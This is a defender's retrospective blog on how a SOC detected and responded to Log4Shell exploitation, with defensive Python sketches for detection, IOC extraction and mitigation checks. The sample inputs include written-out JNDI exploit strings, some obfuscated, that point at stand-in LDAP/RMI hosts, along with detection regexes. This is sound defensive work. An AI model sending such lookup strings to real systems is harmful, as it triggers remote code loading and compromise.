Authored by Edwin van Vliet and Max Groot
One year ago, Fox-IT and NCC Group released their blogpost detailing findings on detecting & responding to exploitation of CVE-2021-44228, better known as ‘Log4Shell’. Log4Shell was a textbook example of a code red scenario: exploitation was trivial, the software was widely used in all sorts of applications accessible from the internet, patches were not yet available and successful exploitation would result in remote code execution. To make matters worse, advisories heavily differed in the early hours of the incident, resulting in conflicting information about which products were affected.
Due to the high-profile nature of Log4Shell, the vulnerability quickly drew the attention of both attackers and defenders. This wasn’t the first time such a ‘perfect storm’ had taken place, and it will definitely not be the last. This one-year anniversary seems like an appropriate time to look back and reflect on what we did right and what we could do better next time.
Reflection firstly requires us to critically look at ourselves. Thus, in the first part of this blog we will look back at how our own Security Operations Center (SOC) tackled the problem in the initial days of the ‘code red’. What challenges did we face, what solutions worked, and what lessons will we apply for the next code red scenario?
The second part of this blog discusses the remainder of the year. Our CIRT has since been contacted by several organizations that were exploited using Log4Shell. Such cases ranged from mere coinminers to domain-wide ransomware, but there were several common denominators among those cases that provide insight into how even a high-profile vulnerability such as Log4Shell can go by unnoticed and result in a compromise further down the line.
Within our SOC we are tasked with detecting attacks and providing monitored customers with actionable information in a timely manner. We do not want to call them for generic internet noise, and they expect us to only call when a response on their end is necessary. Our role is restricted to monitoring: we do not segment, we do not block, and we do not patch. During the Log4Shell incident, our primary objective was to keep our customers secure by identifying compromised systems quickly and effectively.
The table below summarizes the most important actions we undertook in response to the emergence of the Log4Shell vulnerability. We will reflect further on these events to discuss why we made certain decisions, as well as consider what we could have done differently and what we did right.
| Estimated Time (UTC) | Event |
| --- | --- |
| 2021-12-09 22:00 (+0H) | Proof-of-concept for Log4Shell exploitation was published on GitHub |
| 2021-12-10 08:00 (+10H) | Push experimental Suricata rule to detect exploitation attempts |
| 2021-12-10 12:30 (+14.5H) | Finish tool that harvests IOCs out of detected exploitation attempts, start hunting across all platforms |
| 2021-12-10 15:00 (+17H) | Behavior-based detection picks up first successful hack using Log4Shell |
| 2021-12-10 21:00 (+23H) | Transition from improvised IOC hunting to emergency hunting shifts |
| 2021-12-11 10:00 (+36H) | Report first incidents based on hunting to customers |
| 2021-12-11 16:00 (+42H) | Send advisory, status update and IOCs to SOC customers |
| 2021-12-11 17:00 (+43H) | Add Suricata rule to testing that can distinguish between failed and successful exploitation in real time |
| 2021-12-12 08:00 (+58H) | Determine that real-time detection works, move to production |
| 2021-12-12 08:10 (+58H) | Decide to publish all detection & IOCs as soon as possible |
| 2021-12-12 14:00 (+62H) | Refactor IOC harvesting tool to keep up with exploitation volume |
| 2021-12-12 14:30 (+62.5H) | Another successful hack found using hunting procedure |
| 2021-12-12 19:30 (+67.5H) | Publish all detection and IOCs in Log4Shell blog |
| 2021-12-12 21:00 (+69H) | End emergency hunting procedure |
| 2021-12-13 06:30 (+80.5H) | Successful hack detected using Suricata rule |
On Thursday evening, a proof-of-concept was published on GitHub that made it trivial for attackers to exploit Log4Shell. When we became aware of this on Friday morning, our first priority was getting visibility. As we monitor networks with significant exposure to the internet, we anticipated that exploitation attempts would be coming quickly and in vast volumes. One of the first things we did was add detection for exploitation attempts. While we knew that we could not manually investigate every exploitation attempt, detecting them in the first place would give us a starting point for a threat hunt, add context to other alerts, and give us an idea of how the vulnerability was being exploited in the wild. Of course, methods of gaining visibility differ for every SOC and even per threat scenario, but if you can deploy measures to increase visibility, these will often help you out for the remainder of your response process.
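To make this concrete, here is a much-simplified Python sketch of what detecting exploitation attempts can look like when all you have is the content of HTTP request fields (headers, URI, body). It is purely illustrative: our actual detection consisted of Suricata rules, and the patterns and sample values below are our own assumptions, not the rules we deployed.

```python
import re

# Naive check: the literal lookup prefix seen in the earliest exploitation attempts.
NAIVE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Attackers quickly moved to nested lookups such as ${${lower:j}ndi:...} or
# ${${::-j}${::-n}${::-d}${::-i}:...}. This deliberately loose (and noisy)
# heuristic tolerates arbitrary fragments between the letters j-n-d-i.
TOLERANT = re.compile(
    r"\$\{.{0,200}?j.{0,80}?n.{0,80}?d.{0,80}?i.{0,80}?:",
    re.IGNORECASE | re.DOTALL,
)

def looks_like_log4shell_attempt(http_field: str) -> bool:
    """Return True if an HTTP header/URI/body value looks like a JNDI lookup."""
    return bool(NAIVE.search(http_field) or TOLERANT.search(http_field))

if __name__ == "__main__":
    samples = [
        "${jndi:ldap://203.0.113.10:1389/Exploit}",                  # plain attempt
        "${${lower:j}${lower:n}${lower:d}i:ldap://198.51.100.7/a}",  # obfuscated attempt
        "Mozilla/5.0 (compatible; Googlebot/2.1)",                   # benign value
    ]
    for value in samples:
        print(looks_like_log4shell_attempt(value), value)
```

In practice this kind of matching produces both false positives and misses, which is exactly why we treated exploitation-attempt detections as hunting leads and context rather than as incidents in themselves.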
While we would have preferred to have full detection coverage immediately, that is often not realistic. We hoped that by detecting exploitation attempts, we would be pointed in the right direction for finding additional detection opportunities.
For the Log4Shell vulnerability, there was an additional benefit. Exploitation of Log4Shell is a multi-step process: upon successful exploitation, the vulnerable Log4J package reaches out to an attacker-controlled server to retrieve the second-stage payload. This multi-step exploitation process works to the advantage of defenders: initial exploitation attempts contain the location of the attacker-controlled server that hosts the second-stage payload. This made it possible to automatically retrieve and process the exploitation attempts that were detected, and to use them to generate a list of high-confidence Indicators of Compromise (IOCs). After all, a connection to a server hosting a second-stage payload could be a strong indicator that successful exploitation had occurred.
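As an illustration of why that multi-step process helps defenders, the sketch below pulls the attacker-controlled server out of detected exploitation attempts and turns it into a small IOC list. The sample strings, regular expression and function names are hypothetical; our actual harvesting tool operated on detections coming out of our monitoring pipeline.

```python
import re
from urllib.parse import urlparse

# Hypothetical examples of detected exploitation attempts; in reality these
# arrive in HTTP headers such as User-Agent or X-Forwarded-For, or in the URI.
DETECTED_ATTEMPTS = [
    "${jndi:ldap://203.0.113.10:1389/Basic/Command/Base64/ZWNobyBoaQ==}",
    "${jndi:rmi://second-stage.example:1099/obj}",
]

# Grab the URI inside the ${jndi:...} lookup; schemes seen in the wild
# include ldap, ldaps, rmi and dns.
JNDI_URI = re.compile(r"\$\{jndi:((?:ldaps?|rmi|dns)://[^}\s]+)", re.IGNORECASE)

def extract_callback_servers(attempts):
    """Yield (host, port) pairs of second-stage servers referenced in attempts."""
    for attempt in attempts:
        for uri in JNDI_URI.findall(attempt):
            parsed = urlparse(uri)
            if parsed.hostname:
                yield parsed.hostname, parsed.port

if __name__ == "__main__":
    # Deduplicate into a small IOC list that can feed a threat hunt.
    for host, port in sorted(set(extract_callback_servers(DETECTED_ATTEMPTS))):
        print(f"{host}:{port}")
```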
We started regularly mining these IOCs and using them as input for emergency threat hunting. Initially this hunting process was somewhat freeform, but we quickly realized we would be doing multiple such emergency threat hunts over the coming days. We initiated a procedure of emergency hunting shifts, leveraging our on-duty SOC analysts to perform IOC checks and hunt the networks of customers where these IOCs were found.
We were aware that this ‘emergency threat hunting’ approach was not foolproof, for a multitude of reasons.
It was clear that this approach wouldn’t last us all weekend. However, this procedure bought us the much-needed time to dive deeper into the vulnerability and investigate how to detect it ‘on the wire’. Mining IOCs was the ‘quick win’ solution that worked for us, but this might be different for others. The importance of quick wins should not be underestimated: they buy you some time while you move to solutions that are suited for the long term.
Saturday was a day for experimentation: we knew that what we really wanted was the ability to distinguish unsuccessful exploitation attempts from successful ones in real time. At this point, the whole internet was regularly being scanned for Log4Shell, and the alerts were flooding in. It was impossible to manually investigate every exploitation attempt. Distinguishing a failed from a successful exploitation attempt in real time would allow us to respond quickly to incoming threats. Moreover, it would allow us to phase out the emergency hunting shifts, which were placing a heavy burden on our SOC analysts.
While we were researching the vulnerability, we got an alert about a suspicious download in a customer network. The alert had been triggered by a generic rule that monitors for suspicious downloads from rare domains. The download turned out to be post-exploitation activity following remote code execution obtained through Log4Shell. The compromised system had not yet come up in our threat hunting process, but the post-exploitation activity had been caught by our ruleset for generic malicious activity. While signatures for vulnerability exploitation are of great value, they work best in conjunction with detection for generic suspicious activity. In a code red scenario, many attackers will likely fall back on tooling and infrastructure they have used before. Thus, for code reds, having generic detection in place is crucial to ‘fill the gaps’ while you are working on tightening your defenses.
Researching how to detect the vulnerability ‘on the wire’ took time and resources. We had reproduced the exploit in our local lab, and combined with the PCAP from the hack observed in the wild, we had what we needed to work on detection that could distinguish successful from failed exploitation attempts.
Halfway through Saturday, we pushed an experimental Suricata rule that appeared promising. This rule could detect the network traffic that Log4J generates when reaching out to attacker-controlled infrastructure. Therefore, the rule should only trigger on successful exploitation attempts, and not on failed ones. While this worked great in testing, it would take some time to know for sure whether the detection would hold up in production. At that point, the waiting game began. Would this detection yield false positives? Would it trigger when it needed to?
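For readers curious what distinguishing successful from failed exploitation boils down to: after successful exploitation the vulnerable Java process itself opens an outbound LDAP (or RMI) connection to fetch the second stage, and that traffic has a recognizable shape on the wire. The Python heuristic below is a strongly simplified illustration of that idea, not our Suricata rule; the byte values and thresholds are our own assumptions.

```python
# Toy heuristic: does the first client payload of an outbound TCP stream look
# like a BER-encoded LDAP bindRequest? On its own this also matches legitimate
# LDAP clients; the signal comes from combining it with context, e.g. the source
# just received a request containing a JNDI lookup and the destination is external.
LDAP_SEQUENCE = 0x30      # outer LDAPMessage SEQUENCE tag
LDAP_MSGID_TAG = 0x02     # INTEGER tag of the messageID
LDAP_BIND_REQUEST = 0x60  # APPLICATION 0: bindRequest

def looks_like_ldap_bind(first_bytes: bytes) -> bool:
    """Rough check assuming short-form BER lengths, as small binds use them."""
    if len(first_bytes) < 7 or first_bytes[0] != LDAP_SEQUENCE:
        return False
    if first_bytes[2] != LDAP_MSGID_TAG:
        return False
    return LDAP_BIND_REQUEST in first_bytes[3:10]

if __name__ == "__main__":
    # First bytes of a typical anonymous simple bind, as a Java LDAP client sends it.
    java_jndi_bind = bytes.fromhex("300c020101600702010304008000")
    http_request = b"GET / HTTP/1.1\r\nHost: example.org\r\n\r\n"
    print(looks_like_ldap_bind(java_jndi_bind))  # True
    print(looks_like_ldap_bind(http_request))    # False
```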
Something we should have done better at this stage of the ‘code red’ was informing our customers about what we had been doing. When it comes to sending advisories to our customers, we often find ourselves conflicted. Our rule of thumb is that we only send an advisory when we feel we have something meaningful to add that our customers do not know yet. Thus, we had not sent a ‘patch everything as soon as possible’ advisory, as this felt redundant. Having said that, sending an update at an earlier stage about what we were doing would have served our customers better.
On Saturday evening, more than 36 hours after we had started collecting IOCs & threat hunting, we informed our customers about what we had been doing up until that point. We provided IOCs and explained what we had done in terms of detection. We referred to advisories & repositories made by others when it came to patching & mitigation. In hindsight, we should have sent an update earlier about where we would focus our efforts. That would have allowed customers to focus their efforts elsewhere, knowing which part of the responsibility we would take up during the code red. After all, proactively informing those that depend on you for their own defense greatly reduces the amount of redundant work being done across the board.
On Sunday, we had our real-time exploitation detection working. We knew that it worked, as it had triggered several times on systems that had been targeted with Log4Shell exploitation attempts. These systems were segmented in a way that prevented them from setting up connections to external servers, so they could not retrieve the second-stage payload. However, these systems were still highly vulnerable and exposed, and thus we reported such instances as soon as we could.
On Sunday morning, the Dutch National Cyber Security Center (NCSC-NL) assembled all companies that are part of ‘Cyberveilig Nederland’, an initiative in which Fox-IT participates. NCSC-NL had set up a repository where cybersecurity companies could document information on the vulnerability, including the identification of software that could be exploited.
This central repository made it a lot easier for us to share our work in a way that others could easily find within the larger context of the Log4Shell incident. Such a central repository allows organizations like ours to focus on the things they are good at: we are not specialized in patching, but we do know a thing or two about writing detection and responding to identified compromise. Collaboration is key during a code red. Organizations should contribute based on their own specialties so that redundant work can be avoided.
At the start of the day, we had unanimously agreed to publish all our detection as soon as possible, preferably that same day. This was when we started writing our blog. One complication was that we were more than 60 hours in, and fatigue was kicking in. This was also the time to ‘bring in the reinforcements’ and ask others to review our work. IOCs were double-checked, and tools that had been hastily scraped together were refactored to keep up with the volume of alerts. We released the blogpost at about 8PM, a little later than we had aimed for. With the release of our blogpost, we could share all the knowledge we had acquired over the weekend with the security community. We chose to focus on what we know best: network detection and post-exploitation detection. With real-time detection in place, our initial response was done. Over the following weeks, we would continue to work on detecting exploitation, as well as do additional research, such as identifying the varying payloads used in the wild and releasing the log4j-finder.
As a summary, the timeline below highlights the key events in our first 72 hours responding to Log4Shell. Blue events relate to detection engineering, whereas green and red mark key moments in decision-making.
While the high-profile nature of the Log4Shell vulnerability initially alerted almost everyone that action had to be taken, Log4Shell turned out to be a vulnerability with a ‘long tail’. In the year that followed, off-the-shelf exploits became available for several products, and some mitigations that were released early on turned out to be insufficient in the long run. The next section therefore approaches Log4Shell from the incident response perspective: what did we find when we were approached by organizations that had had trouble mitigating?
In the past year, we responded to several incidents where the Log4Shell vulnerability was part of the root cause. In this retrospective we will compare those incidents to the expectations that we had in the security industry. We were expecting many ransomware incidents resulting from this initial attack vector. Was this expectation grounded?
The incident response cases we investigated can largely be divided into four categories. It should be noted that oftentimes, multiple distinct threat actors had left their traces on the victim’s systems. It was not uncommon for us to identify activity from more than one of the following categories on the same system:
We compared the various recommendations that we provided in these incident response cases. All the incidents that led to an engagement of our incident response teams could have been prevented if the available security updates or mitigations had been applied correctly, or if outbound network connections from the vulnerable systems had been restricted.
As always, reality is a little more nuanced. We will elaborate a bit in the following two sections.
In follow-up conversations with organizations that contacted our CIRT, we noticed a pattern: many of them had heard of Log4Shell but believed they were safe. The most common reason for this false sense of safety was a very unfortunate series of events related to patch and lifecycle management.
For example, one vendor had released both a security update and a mitigation script, the latter being for organizations that were not able to immediately apply the security update. On several incident response engagements, we found administrators who had executed the script and thought they were safe, unaware that the vendor had later released new versions of the mitigation script. The first version of the mitigation script apparently did not completely resolve the problem. The newer mitigation scripts performed many more operations that were required to protect against Log4Shell, including for example modifying the Log4J jar-file. As a result of this, several victims were not aware they were still running vulnerable software.
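One lesson we took from these cases is to verify mitigations rather than assume they worked. As a hypothetical illustration (in the spirit of, but far simpler than, the log4j-finder we released), the sketch below checks whether JAR files on disk still contain the JndiLookup class that removal-based mitigations are supposed to strip out. It does not descend into nested JARs or check Log4J versions, so the absence of a hit is not proof of safety.

```python
import zipfile
from pathlib import Path

# The class that removal-based mitigations delete from log4j-core JARs.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def scan_for_jndilookup(root: str) -> None:
    """Print every JAR under 'root' that still contains JndiLookup.class."""
    for jar in Path(root).rglob("*.jar"):
        try:
            with zipfile.ZipFile(jar) as zf:
                if JNDI_CLASS in zf.namelist():
                    print(f"[!] {jar} still contains {JNDI_CLASS}")
        except (zipfile.BadZipFile, OSError):
            # Unreadable or corrupt archive: skipped here, but a real tool should report it.
            continue

if __name__ == "__main__":
    scan_for_jndilookup("/opt")  # example path; point it at your application directories
```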
We also encountered incidents where administrators kept delaying the security upgrades or performed the upgrade but had to roll back to a snapshot due to technical issues after the upgrade. The rollback restored the old situation in which the software was still vulnerable.
The lesson here is that clear communication from vendors about vulnerabilities and mitigations is key. For end users, a mitigation script or action is almost always less preferable than applying the security update. Mitigation scripts should be considered quick wins, not long-term solutions.
The other major mitigation that could have prevented several incidents was network segmentation. Exploitation of this type of vulnerability requires outbound network connections to download a secondary payload. Therefore, in a network segment where connections are heavily regulated, this attack simply would not work.
In server networks, a firewall should typically block all connections by default. Only some connections should be allowed, based on source and/or destination addresses and ports. Of course, in this modern world, cloud computing often requires larger blocks of IP space to be allowed. The usual solution is to configure proxy servers that allow downloading security updates or connecting to cloud services based on domain names.
In a few cases, the initial attempts by malicious actors were unsuccessful, because the outgoing connections were blocked or hindered by the customer’s network infrastructure. However, with later “improvements” some attackers managed to bypass some of the mechanisms (for example, hosting the payload on the often allow-listed port 443), or they found vulnerable services on non-standard ports. Those cases prove it was a race against the clock, because attackers were also improving their techniques.
Besides actively blocking outgoing connections, firewalls offer insight through the log entries they emit. Together with network monitoring, they can immediately single out vulnerable devices. And possibly the biggest advantage of strict network segmentation: it counters zero-days in this entire category of vulnerabilities. A zero-day is not necessarily something that is only used by advanced attackers. Some software that is widely in use today contains vulnerabilities that nobody knows about yet. If such a vulnerability is discovered by a malicious actor, an exploit may be available before a security update is. That is one of the main reasons why we should value strict network segmentation: it provides an additional layer of defense.
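To illustrate the point about log entries: a server that suddenly tries to open outbound LDAP or RMI connections is a strong hunting lead, even (or especially) when the firewall denied those connections. The sketch below assumes a hypothetical CSV export of firewall deny logs with columns action, src_ip, dst_ip and dst_port; real firewall log formats will differ, so treat it as an outline only.

```python
import csv

# Ports commonly used for the second-stage callback (LDAP(S), RMI). Note that
# attackers also abused port 443 precisely because it is usually allowed outbound.
SUSPECT_PORTS = {389, 636, 1099, 1389, 1636}

def flag_denied_callbacks(path: str) -> dict[str, set[str]]:
    """Map internal sources to the destinations they tried (and failed) to reach."""
    hits: dict[str, set[str]] = {}
    with open(path, newline="") as fh:
        for row in csv.DictReader(fh):
            if row["action"].lower() != "deny":
                continue
            if int(row["dst_port"]) in SUSPECT_PORTS:
                hits.setdefault(row["src_ip"], set()).add(row["dst_ip"])
    return hits

if __name__ == "__main__":
    for src, dsts in flag_denied_callbacks("firewall_deny.csv").items():
        print(f"{src} attempted {len(dsts)} suspicious outbound destination(s): investigate")
```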
Looking back, we have dealt with far fewer incidents than we had initially expected. Does this mean that we were overly pessimistic? Or does it mean that our “campaign” as a security industry was very effective? We like to believe the latter. After all, almost everybody who needed to know about the problem knew about it.
Having said that, one risk we are all taking is that of numbing our audience. We need to be conservative in sending out ‘code red’ security advisories to prevent the “boy who cried wolf” syndrome. Nowadays it sometimes seems like the security industry does not take its end users seriously enough to believe that they will act on vulnerabilities that do not have a catchy name and logo.
In this case, we as a security community gave Log4Shell a lot of attention. We think this was justified. The vulnerability was easy to exploit with PoC code available, and the Log4J component was used in many software products. Moreover, we saw widespread exploitation in the wild, albeit mostly using off-the-shelf exploits for products that use Log4J.
Our role within the security industry comes with the responsibility to inform. With a component as widespread as Log4J, it is very difficult to provide specific advice. It’s the software vendors whose software uses these components who need to provide more specific security advisories. Their advisories need to be actionable. We think that for the general public, it is best to closely follow those specific advisories for products they might be using.
As security vendors, we should not simply repeat information that is already available, as that only leads to confusion. Instead, we should contribute within our own areas of expertise. For the next code red, we know what we’ll do: focus our efforts where we have something to add, and stay out of areas where we do not. Bring it on!